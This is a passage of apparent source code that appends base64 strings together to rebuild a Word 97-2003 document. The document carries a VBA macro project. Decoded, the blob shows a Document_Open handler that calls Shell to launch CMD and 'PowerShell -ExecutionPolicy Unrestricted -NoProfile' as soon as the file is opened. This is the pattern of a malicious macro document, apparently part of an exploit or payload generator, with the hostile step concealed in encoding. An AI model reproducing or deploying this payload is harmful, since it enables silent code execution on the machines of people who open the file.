//////////wAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAEAAAAAAA").append("AAUAUwB1AG0AbQBhAHIAeQBJAG4AZg").append("BvAHIAbQBhAHQAaQBvAG4AAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAoAA").append("IBAgAAAAQAAAD/////AAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAFwAAAAAQAAAAAAAABQBEAG8A").append("YwB1AG0AZQBuAHQAUwB1AG0AbQBhAH").append("IAeQBJAG4AZgBvAHIAbQBhAHQAaQBv").append("AG4AAAAAAAAAAAAAADgAAgH///////").append("////////8AAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAfAA").append("AAABAAAAAAAABNAGEAYwByAG8AcwAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAADgABAQEAAAAQAAAADwAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAcGY/").append("9w4R1gEQ7UD3DhHWAQAAAAAAAAAAAA").append("AAAFYAQgBBAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAI").append("AAEA//////////8JAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAABwZj/3DhHWAfCe").append("QPcOEdYBAAAAAAAAAAAAAAAAVABoAG").append("kAcwBEAG8AYwB1AG0AZQBuAHQAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAABoAAgH/////").append("CgAAAP////8AAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAzQcAAAAAAAABAAAAAgAAAAMAAA").append("AEAAAABQAAAAYAAAAHAAAACAAAAAkA").append("AAAKAAAACwAAAAwAAAANAAAADgAAAA").append("8AAAAQAAAAEQAAABIAAAATAAAAFAAA").append("ABUAAAAWAAAAFwAAABgAAAAZAAAAGg").append("AAABsAAAAcAAAAHQAAAB4AAAAfAAAA").append("/v///yEAAAAiAAAAIwAAACQAAAAlAA").append("AAJgAAACcAAAAoAAAAKQAAACoAAAD+").append("////LAAAAC0AAAD+////LwAAADAAAA").append("AxAAAAMgAAADMAAAA0AAAANQAAADYA").append("AAA3AAAAOAAAADkAAAA6AAAAOwAAAD").append("wAAAA9AAAAPgAAAD8AAABAAAAAQQAA").append("AEIAAABDAAAARAAAAEUAAABGAAAARw").append("AAAEgAAABJAAAASgAAAEsAAABMAAAA").append("TQAAAE4AAABPAAAAUAAAAFEAAABSAA").append("AAUwAAAFQAAAD+////VgAAAFcAAABY").append("AAAAWQAAAFoAAABbAAAAXAAAAP7///").append("9eAAAAXwAAAGAAAABhAAAAYgAAAGMA").append("AABkAAAAZQAAAGYAAABnAAAAaAAAAG").append("kAAABqAAAAawAAAGwAAABtAAAAbgAA").append("AG8AAABwAAAAcQAAAHIAAABzAAAAdA").append("AAAHUAAAB2AAAAdwAAAHgAAAD+////").append("egAAAHsAAAD+/////v///34AAAB/AA").append("AAgAAAAAEWAwAEAAEAAEQFAADkAAAA").append("EgIAAIUFAACTBQAAtwYAAAAAAAABAA").append("AAQKkohQAA//+jAQAAiAAAALYA//8B").append("AQAAAAD/////AAAAAP//cAD//wAAeb").append("k80EDkT0K+jWNRrQkmPzAYvQXtFYVL").append("sIh3sk765ssAAAAAAAAAAAAAAAAAAA").append("AAAQAAABTfE3iu9W1BvtkAVRrNqw0Q").append("AAAAAwAAAAUAAAAHAAAA//////////").append("8BAQgAAAD/////eAAAAAgU3xN4rvVt").append("Qb7ZAFUazasNebk80EDkT0K+jWNRrQ").append("kmP///AAAAAE1FAAD///////8AAAAA").append("//8AAAAA//8BAQAAAADfAP//AAAAAC").append("gA////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////9QAAAAAg").append("BTIv////8AAAEAUxD/////AAABAFMi").append("/////wAAAAA2Iv////8AAAAAGgj///").append("//AAAAAAI8MAD//wAAAAACPDgA//8A").append("AAAAAjz/////AAD//wEBAAAAAAEAKA").append("AxAE4AbwByAG0AYQBsAC4AVABoAGkA").append("cwBEAG8AYwB1AG0AZQBuAHQACQAAAA").append("AAYAAAAAEBoAIAAAKA/v//////IAAA").append("AP////8wAAAAAgH//wAAAAAAAAAA//").append("////////8AAAAAAAAAAB0AAAAlAAAA").append("/////ygBAAD/////KAEAAP////8oAQ").append("AA/////ygBAAD/////KAEAALAAAAAo").append("AAAAsAAAAAEAAACwAAAAAQAAALAAAA").append("AQAAAA6P////////8MAP//IAAAAGmD").append("/v//////////////////////AAAAAP").append("////8gAAAAsAEAAAAAAAACg/7/////").append("/wAAAAD/////6AAAAAAA////////AA").append("AAAP//////////AAAAAAAAAAAdABgA").append("JQAAAIKgJAL//////v////////8gAQ").append("AAAgD///7///8AAAAA//////////8A").append("AAAAAAAAAB0AGAAlAAAACxEwAv////").append("8AAARgAAAAAP//////////AAAAAAAA").append("AAAAAAAAAAAAAP////8AAAAASAAAAA").append("AAAAD/////GAAAAAgOAAAEAAQAAAAA").append("AAAAAACcAAABAAAAAGmD/v////////").append("//////////////AAAAAP////8gAAAA").append("/////1gAAAD/////oAEAAHgCAACwAA").append("AA////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("////////////////////////94AgAA").append("EAAAAND/////////DAD//yAAAAD///").append("//8AAAAP////9oAgAA/////xAAAADI").append("/////////wUA//8gAAAA/////1gCAA").append("D/////kAIAAAEAAQAAAAEAAAAAAAAA").append("AAAoAQAA//////////8AAAAA//////").append("////8oAQAA//////////8AAAAA////").append("////////////8AAAALgAAAAAAAAAAA").append("AAAHgAAAAIAAAAAAAQDggO////////").append("/////////////////////xAAAAACAF").append("gAAAAXDn5gBgABJAAqAFwAUgBmAGYA").append("ZgBmACoAMAA2ADYAMAA3AGUAMABlAD").append("EANwABEAAqAFwAUgAwACoAIwAxADcA").append("3wEAAAAAAP////9gAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAA/soBAAQAIoEIAAYABgAA").append("AAAAAIEIBB4AAAAoAAAAAIEIBFQAAA").append("BIAAAABIEIAAIACAAIAAAA/////wEB").append("qAAAAJYEKAEAAAAAbwD//2AAAAD///").append("//gAAAAP////+gAAAA/////0gAAAC5").append("AAEAQwC5AAEATQALALkAAQBEAAsAHQ").append("BBQDICAQAAALkABQBQb3dlcgC5ABAA").append("U2hlbGwgLUV4ZWN1dGlvbgsAuQAXAF").append("BvbGljeSBVbnJlc3RyaWN0ZWQgLU5v").append("AAsAuQAHAFByb2ZpbGUACwAdAEFAMg").append("IBAAAAAAD/////SAAAAP////8AAAEM").append("sQBBdHRyaWJ1dABlIFZCX05hbQBlID").append("0gIlRoaQBzRG9jdW1lbhB0Ig0KCoxC").append("YXMBAowxTm9ybWFsAi4ZVkdsb2JhbC").append("EBqlNwYWMBbEZhCGxzZQyiQ3JlYRB0").append("YWJsFR9QcmUgZGVjbGEABklkEQCeVH").append("J1DUJFeHAIb3NlFBxUZW1wAGxhdGVE").append("ZXJpAnYVJEN1c3RvbWxpeoRDgzFQAB").append("gAHCAQU3ViIIWHX09wgGVuKCkNCiAA").append("AABTaGVsbCAoIoBDIiArICJNggIERC").append("IMDlBvd2VyAwINAxctRXhlY3UQdGlv").append("bgIKUG9sAGljeSBVbnJlEnOAxWN0AF").append("EtTm+Bgw1yb2ZpbGWBKAhFbmSBQw0K").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAXwBfAFMAUgBQAF8AMgAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAABAAAgENAAAA//////////8AAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAgAAAAtgIAAAAAAABf").append("AF8AUwBSAFAAXwAzAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAEAACAQ").append("wAAAAHAAAA/////wAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAACsAAACcAAAAAAAAAF8AVgBCAEEA").append("XwBQAFIATwBKAEUAQwBUAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAaAAIA//////////").append("//////AAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAALgAAAI").append("sJAAAAAAAAZABpAHIAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAgAAgH///////////////8AAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAABVAAAAAAIAAAAAAA").append("ByVYAAAAAAAAAAAAAAAAAAAABAAAAA").append("AAAAAEAAAAAAAAAAAAAAAAAAAAA4AA").append("AAAAAAABEAAAAAAAAAAAAAABEAAAAA").append("AAAAAAADAFAAAAAAAAAAAAAAAAEAAQ").append("ADAAAAEQkAAAAAAAAAAAAAsQgAAAAA").append("AAAAAAAAoQoAAAAAAAAAAAAAAQABAA").append("AAAQBxBwAAAAAAAAAAAAChBwAAAAAA").append("AAAAAADRBwAAAAAAAAAAAAARAAAAAA").append("AAAAEAAgBBBwAAAAAAAAAAAAAIAA0A").append("YAAAAOEDAAAAAAAAAAAAALEAAAAAAA").append("AAAAABABEIAAAAAAAAAAAAAP//////").append("/////////wEABQAAAAAABGBpBAAAAA").append("AAAAAAAgD/////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////AQC6AekC").append("AAAAAAAAAAACAMYAAAAAAAAAdAAAAA").append("AAAABnAgYAAABnAjIAAADwBQIAAAD+").append("Bej///8BAEkG0P///58C0P////0EAA").append("AQAL0CyP///7wD0P///2cCMgAAAPAF").append("AgAAAP4F6P///wIASQbQ////nwLQ//").append("///QQAABAAvQLI////vAPQ////ZwIA").append("AAAA+AEtAAAAAAAAAAAACAA4AHQAAA").append("A4AAAACAAAAAAAAAAAAAAAAAAAABQA").append("AAAAAAAAAAAAAAAAAAAAAAAAGgAAAA").append("AAAAAAAAEAAAAAAAAAAADQ////AgAU").append("AAAAAAAAEwAAYACRAgAAAAAAAAAAAg").append("ARBAAAAAAAAAAAAgAgAAAAAAAADgAB").append("WgACCAwAAAAAAAB/IAAAAAAAAA4AAV").append("oAAghcAAAAAAAAfwAAAAAAAAAAAAAA").append("AAAAAAAAAHJVQAAAAAAAAAAAAAAAAA").append("AAAEAAAAAAAAAAQAAAAAAAAAAAAAAA").append("AAAAABoAAAAAAAAAEQAAAAAAAAAAAA").append("IA////////////////AAAAAHgAAAAI").append("ADgA4QEAAAAAAAAAAAIAAAAEYAAACA").append("44AP////////////////////8AAAAA").append("AAAAAB8AAAAAAAAAYgAAAAAAAH8AAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAMxhsg").append("AAAwD/GgQAAAkEAADiBAMAAAAAAAAA").append("AAABAAUAAgAgASoAXABHAHsAMAAwAD").append("AAMgAwADQARQBGAC0AMAAwADAAMAAt").append("ADAAMAAwADAALQBDADAAMAAwAC0AMA").append("AwADAAMAAwADAAMAAwADAAMAA0ADYA").append("fQAjADQALgAyACMAOQAjAEMAOgBcAF").append("AAcgBvAGcAcgBhAG0AIABGAGkAbABl").append("AHMAXABDAG8AbQBtAG8AbgAgAEYAaQ").append("BsAGUAcwBcAE0AaQBjAHIAbwBzAG8A").append("ZgB0ACAAUwBoAGEAcgBlAGQAXABWAE").append("IAQQBcAFYAQgBBADcALgAxAFwAVgBC").append("AEUANwAuAEQATABMACMAVgBpAHMAdQ").append("BhAGwAIABCAGEAcwBpAGMAIABGAG8A").append("cgAgAEEAcABwAGwAaQBjAGEAdABpAG").append("8AbgBzAAAAAAAAAAAAAAAAABoBKgBc").append("AEcAewAwADAAMAAyADAAOQAwADUALQ").append("AwADAAMAAwAC0AMAAwADAAMAAtAEMA").append("MAAwADAALQAwADAAMAAwADAAMAAwAD").append("AAMAAwADQANgB9ACMAOAAuADcAIwAw").append("ACMAQwA6AFwAUAByAG8AZwByAGEAbQ").append("AgAEYAaQBsAGUAcwBcAE0AaQBjAHIA").append("bwBzAG8AZgB0ACAATwBmAGYAaQBjAG").append("UAXABSAG8AbwB0AFwATwBmAGYAaQBj").append("AGUAMQA2AFwATQBTAFcATwBSAEQALg").append("BPAEwAQgAjAE0AaQBjAHIAbwBzAG8A").append("ZgB0ACAAVwBvAHIAZAAgADEANgAuAD").append("AAIABPAGIAagBlAGMAdAAgAEwAaQBi").append("AHIAYQByAHkAAAAAAAAAAAAAAAAAvA").append("AqAFwARwB7ADAAMAAwADIAMAA0ADMA").append("MAAtADAAMAAwADAALQAwADAAMAAwAC").append("0AQwAwADAAMAAtADAAMAAwADAAMAAw").append("ADAAMAAwADAANAA2AH0AIwAyAC4AMA").append("AjADAAIwBDADoAXABXAGkAbgBkAG8A").append("dwBzAFwAUwB5AHMAdABlAG0AMwAyAF").append("wAcwB0AGQAbwBsAGUAMgAuAHQAbABi").append("ACMATwBMAEUAIABBAHUAdABvAG0AYQ").append("B0AGkAbwBuAAAAAAAAAAAAAAAAABIA").append("KgBcAEMATgBvAHIAbQBhAGwAEgAqAF").append("wAQwBOAG8AcgBtAGEAbAAXDn5gBAAA").append("AAAAAAAoASoAXABHAHsAMgBEAEYAOA").append("BEADAANABDAC0ANQBCAEYAQQAtADEA").append("MAAxAEIALQBCAEQARQA1AC0AMAAwAE").append("EAQQAwADAANAA0AEQARQA1ADIAfQAj").append("ADIALgA4ACMAMAAjAEMAOgBcAFAAcg").append("BvAGcAcgBhAG0AIABGAGkAbABlAHMA").append("XABDAG8AbQBtAG8AbgAgAEYAaQBsAG").append("UAcwBcAE0AaQBjAHIAbwBzAG8AZgB0").append("ACAAUwBoAGEAcgBlAGQAXABPAEYARg").append("BJAEMARQAxADYAXABNAFMATwAuAEQA").append("TABMACMATQBpAGMAcgBvAHMAbwBmAH").append("QAIABPAGYAZgBpAGMAZQAgADEANgAu").append("ADAAIABPAGIAagBlAGMAdAAgAEwAaQ").append("BiAHIAYQByAHkAAAAAAAAAAAAAAAAA").append("AQACAAYAEgIAABQCAQAWAgEAGAIAAB").append("oCAQAcAgEAIgL///////8AAAAAAAAA").append("ABcOfmAGAP////////////////////").append("//////////////////////////////").append("////////////////AAD///////////").append("////8BAAAAAAAAAAAAAAAAAAAAAAAA").append("AECpAQAYAFQAaABpAHMARABvAGMAdQ").append("BtAGUAbgB0ABQAMAA2ADYAMAA3AGUA").append("MABlADEANwD//yUCGABUAGgAaQBzAE").append("QAbwBjAHUAbQBlAG4AdAD//yiFAAAA").append("AAAAAAIAAAC9BgAA////////AQEgAg").append("AA////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("///////////////wACAAD/////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("////////////////////////+bS632").append("LKNxQbR94z4z8Emm/////wEAAAD///").append("//YAAAAIAAAAAAAB0BFwAGAZQsAAAE").append("DFdvcmS1axAAAwxWQkH34hAABQRXaW").append("4xNsF+EAAFBFdpbjMyB38QAAUEV2lu").append("NjR4fxAAAwRNYWOzshAABARWQkE2rS").append("MQAAQEVkJBN64jEAAIBFByb2plY3Qx").append("ChcQAAYMc3Rkb2xlk2AQAAcMUHJvam").append("VjdC2uEAAMDFRoaXNEb2N1bWVudDye").append("EAAJgAAA/wMDAF9FdmFsdWF0ZRjZEA").append("AGCE5vcm1hbN/YEAAGjCgA/wMDAE9m").append("ZmljZRV1EAAIBERvY3VtZW50atMQAA").append("wERG9jdW1lbnRfTmV3O0UQAA0ERG9j").append("dW1lbnRfT3BlbsGJEAAFAFNoZWxsVt").append("cQAAKAAAD/AwMATUQ6XhAAAYAAAP8D").append("AwBEWxAQAAaAAAD/AwMAUG9saWN5CE").append("8QAAeAAAD/AwMAUHJvZmlsZRiuEAAC").append("//8BAVQAAAD///////////////////").append("////////////////////////////8g").append("AgIA//8iAv////8lAgAACAD///////").append("8oAgMA//8OAgEA//8QAgAA//8qAgQA").append("//8IAA4AAAABABIAAAAAAAAAAAAAAA").append("AAAAAAAAAAAQAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAH8sYAB").append("AAQAAAADADAqAgKQCQBwFAZIAwCCAg").append("Bk4gQEAAcAHABQcm9qZWN0BVEAKAAA").append("QAIUBgIUPa0CCgcCbAEUCAYSCQISgB").append("cOfmAGAAwCShI8AgoWAAFyc3RkEG9s").append("ZT4CGXMAdAAAZABvAGwAZVAADQBoAC").append("VeAAMqAFxHezAwMDIwsDQzMC0ACAQE").append("QwAKAwIOARIwMDQ2fSMAMi4wIzAjQz").append("oAXFdpbmRvd3MAXFN5c3RlbTMEMlwD").append("ZTIudGxiACNPTEUgQXV0gG9tYXRpb2").append("4AYAMAAoNFTm9ybWFsBYNFToBDcgBt").append("AGFRgEYOACCAEQmAASqcXEMDEgoGgW").append("0EAIMhIE9mZmljhGdPAKJmgABpAGOC").append("Z56AHwKUgiFHezJERjgARDA0Qy01Qk").append("YAQS0xMDFCLUJIREU1gGdBQYBlNA2A").append("BTKIZ4C6Z3JhbQAgRmlsZXNcQyBvbW").append("1vbgQGTWkAY3Jvc29mdCAAU2hhcmVk").append("XE8ARkZJQ0UxNlwATVNPLkRMTCMDhx").append("CDTSAxNi4wIARPYoHjIExpYnJYYXJ5").append("gCWAAA+CegFEABPCAUCpGUJlVABoaX").append("NEb2N1bUBlbnRHABjACVRBwGZpAHMA").append("RMBIY0QAdUBJZQBuwG4aFc4LMtoLHM").append("ASAABI1UIBMUKJvYCEHkICAQWiLMIh").append("KIUiQggrQgECEEIBk0sqsgMAEAAAAP").append("//AAAAAAEAAgD//wAAAAABAAAAAAAA").append("AAAAAQACAAAAAAAAAAEABQAFAAUABQ").append("AFAAUABQAFAAUABQAFAAUAAQAJAAAA").append("KlxDTm9ybWFsclXAAAAAAAAAAEAAAA").append("AAAAAAQAAAAAAAAABAAAAAAAAAAAYA").append("AAAAAAB+CgAAAAAAAH4CAAAAAAAAfg").append("IAAAAAAAB+AgAAAAAAAH4CAAAAAAAA").append("fgYAAAAAAAB+UgAAAAAAAH8AAAAAAA").append("AAXwBfAFMAUgBQAF8AMAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAABAA").append("AgALAAAACAAAAP////8AAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAABdAAAA4QYAAAAAAABfAF8AUw").append("BSAFAAXwAxAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAEAACAP//////").append("/////////wAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAHkA").append("AACuAAAAAAAAAFAAUgBPAEoARQBDAF").append("QAdwBtAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAUAAIA////////////////").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAfAAAACkAAAAA").append("AAAAUABSAE8ASgBFAEMAVAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAB").append("AAAgEGAAAADgAAAP////8AAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAB9AAAAcwEAAAAAAAAAIgAA").append("AAAAAAARAAAAAAAAAAAAAQAQAAAAAA").append("AAAAAAAABhAQAAAAAAAAAAAAAv2B1Y").append("w5jxSIQf1B48EsRcAQAJBAAAGgQAAO").append("IEAAAAAAAAAQD//////////wEAgwpF").append("ABEAAAAAAAAAAAACAHEIAAAAAAAAAA").append("AAAP//////////AQBBCAAAAAAAAAAA").append("AAD//wAAMQEAAAAAAAAAAAAABQBxAg").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAEQQAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAEEFAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAARAAAAAAAAAA").append("EAAADh5We6sFQERZnWhHlT3g71sQYA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAQAAAAAAAACDAAAAAAAAABUaGlz").append("RG9jdW1lbnQCAAAAAAAAAgcAAAAAAA").append("AAUHJvamVjdAQAAAAAAAAD7wQCAAAA").append("AADAAAAAAAAARhIAAAAAAAACQgAAAA").append("AAAABDOlxQcm9ncmFtIEZpbGVzXENv").append("bW1vbiBGaWxlc1xNaWNyb3NvZnQgU2").append("hhcmVkXFZCQVxWQkE3LjFcVkJFNy5E").append("TEwCAAAAAAAAAgMAAAAAAAAAVkJBEA").append("AAAAAAAAqBAQAAAAAAAAAAAAD/////").append("/////wQAAgAJAAAAsQEAAAAAAAAAAA").append("AAUQIAAAAAAAAAAAAAsAAAAAAAAAAA").append("AAAAAAAAAAAABAAAAAAAAAMFCQIAAA").append("AAAMAAAAAAAABGEAAAAAAAAAI6AAAA").append("AAAAAEM6XFByb2dyYW0gRmlsZXNcTW").append("ljcm9zb2Z0IE9mZmljZVxSb290XE9m").append("ZmljZTE2XE1TV09SRC5PTEICAAAAAA").append("AAAgQAAAAAAAAAV29yZAQAAAAAAAAD").append("AgoCAAAAAADAAAAAAAAARhAAAAAAAA").append("AKAQMAAAAAAAAAAAAA//////////8I").append("AAcAAAAAADEDAAAAAAAAAAAAAMEDAA").append("AAAAAAAAAAANAAAAAAAAAAAAAAAAAA").append("AAAAAAQAAAAAAAADMAQCAAAAAADAAA").append("AAAAAARggAAAAAAAACHwAAAAAAAABD").append("OlxXaW5kb3dzXFN5c3RlbTMyXHN0ZG").append("9sZTIudGxiAgAAAAAAAAIGAAAAAAAA").append("AHN0ZG9sZRAAAAAAAAAKoQQAAAAAAA").append("AAAAAA//////////8CAAAAAAAAANEE").append("AAAAAAAAAAAAACEFAAAAAAAAAAAAAP").append("AAAAAAAAAAAAAAAAAAAAAAAAQAAAAA").append("AAADTND4LfpbGxC95QCqAETeUhAAAA").append("AAAAACPwAAAAAAAABDOlxQcm9ncmFt").append("IEZpbGVzXENvbW1vbiBGaWxlc1xNaW").append("Nyb3NvZnQgU2hhcmVkXE9GRklDRTE2").append("XE1TTy5ETEwCAAAAAAAAAgYAAAAAAA").append("AAT2ZmaWNlEAAAAAAAAArRBQAAAAAA").append("AAAAAAD//////////wIACAAAAAAAAQ").append("YAAAAAAAAAAAAAkQYAAAAAAAAAAAAA").append("EAEAAAAAAAAAAAAAAAAAAAAABAAAAA").append("AAAANrCQIAAAAAAMAAAAAAAABGBAAA").append("AAAAAAN5uTzQQORPQr6NY1GtCSY/BA").append("AAAAAAAAMwGL0F7RWFS7CId7JO+ubL").append("BgAAAAAAAAMU3xN4rvVtQb7ZAFUaza").append("sNBAAAAAAAAAIIAAAAAAAAAERvY3Vt").append("ZW50BAAAAAAAAAINAAAAAAAAAERvY3").append("VtZW50X09wZW4GAAAAAAAADRQAFAAA").append("AHgAAAAAAAAAAAAAAAAAAAAEAAAAAA").append("AACwYAAABDAE0ARAAEAAAAAAAAAggA").append("AAAAAAAAVkJFNy5ETEwOAAAAAAAAB+").append("EIAAAAAAAAAAAAAP//////////WAIL").append("AJEJAAAAAAAAAAAAADABAAAAAAAAAA").append("AAACAAAAAAAAAOAgJhAAQIAhwAAAAA").append("AAALZgAAAFAAbwB3AGUAcgBTAGgAZQ").append("BsAGwAIAAtAEUAeABlAGMAdQB0AGkA").append("bwBuAFAAbwBsAGkAYwB5ACAAVQBuAH").append("IAZQBzAHQAcgBpAGMAdABlAGQAIAAt").append("AE4AbwBQAHIAbwBmAGkAbABlAA4AAA").append("AAAAB/AAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAcl").append("VAAAAAAAAAAEAAAAAAAAAAQAAAAAAA").append("AABAAAAAAAAAAAIAAAAAAAB+egAAAA").append("AAAH8AAAAAAAAAABIAAAAAAAAAEQAA").append("AAAAAAAAAAAA//////////////////").append("////////8AAAAAEQAAAAAAAAAAAAMA").append("BgAAAAAAAAkRBAAAAAAAAAAAAADhAw").append("AAAAAAAAAAAAAQAAAAAAAAAAAAAQBi").append("AAAAAAAAfwAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAVGhpc0RvY3VtZW50").append("AFQAaABpAHMARABvAGMAdQBtAGUAbg").append("B0AAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAElEPSJ7MDhBM0UyNkQtRD").append("gxRS00RTdFLTgwQTUtNzcyQ0RFODhF").append("NkZCfSINCkRvY3VtZW50PVRoaXNEb2").append("N1bWVudC8mSDAwMDAwMDAwDQpOYW1l").append("PSJQcm9qZWN0Ig0KSGVscENvbnRleH").append("RJRD0iMCINClZlcnNpb25Db21wYXRp").append("YmxlMzI9IjM5MzIyMjAwMCINCkNNRz").append("0iOUI5OTg2QzgwMENDMDBDQzAwQ0Mw").append("MENDIg0KRFBCPSIxOTFCMDQzOYEAAA").append("CCAAAA/v///4QAAAD+////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////////////////").append("//////////////////MDUzOTA1Mzki").append("DQpHQz0iOTc5NThBQ0M3NjM0RjUzNU").append("Y1MzUwQSINCg0KW0hvc3QgRXh0ZW5k").append("ZXIgSW5mb10NCiZIMDAwMDAwMDE9ez").append("M4MzJENjQwLUNGOTAtMTFDRi04RTQz").append("LTAwQTBDOTExMDA1QX07VkJFOyZIMD").append("AwMDAwMDANCg0KW1dvcmtzcGFjZV0N").append("ClRoaXNEb2N1bWVudD0zMiwgMzIsID").append("E0NTYsIDY2MSwgDQoAAAAAAAAAAAAA").append("AAAAAQD+/wMKAAD/////BgkCAAAAAA").append("DAAAAAAAAARiAAAABNaWNyb3NvZnQg").append("V29yZCA5Ny0yMDAzIERvY3VtZW50AA").append("oAAABNU1dvcmREb2MAEAAAAFdvcmQu").append("RG9jdW1lbnQuOAD0ObJxAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAABAEMAbwBtAHAATwBiAG").append("oAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAEgACAP///////////////wAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAIMAAAByAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AA////////////////AAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAD///////").append("////////8AAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA").append("AAAAAAAAAAAAAP///////////////w").append("AAA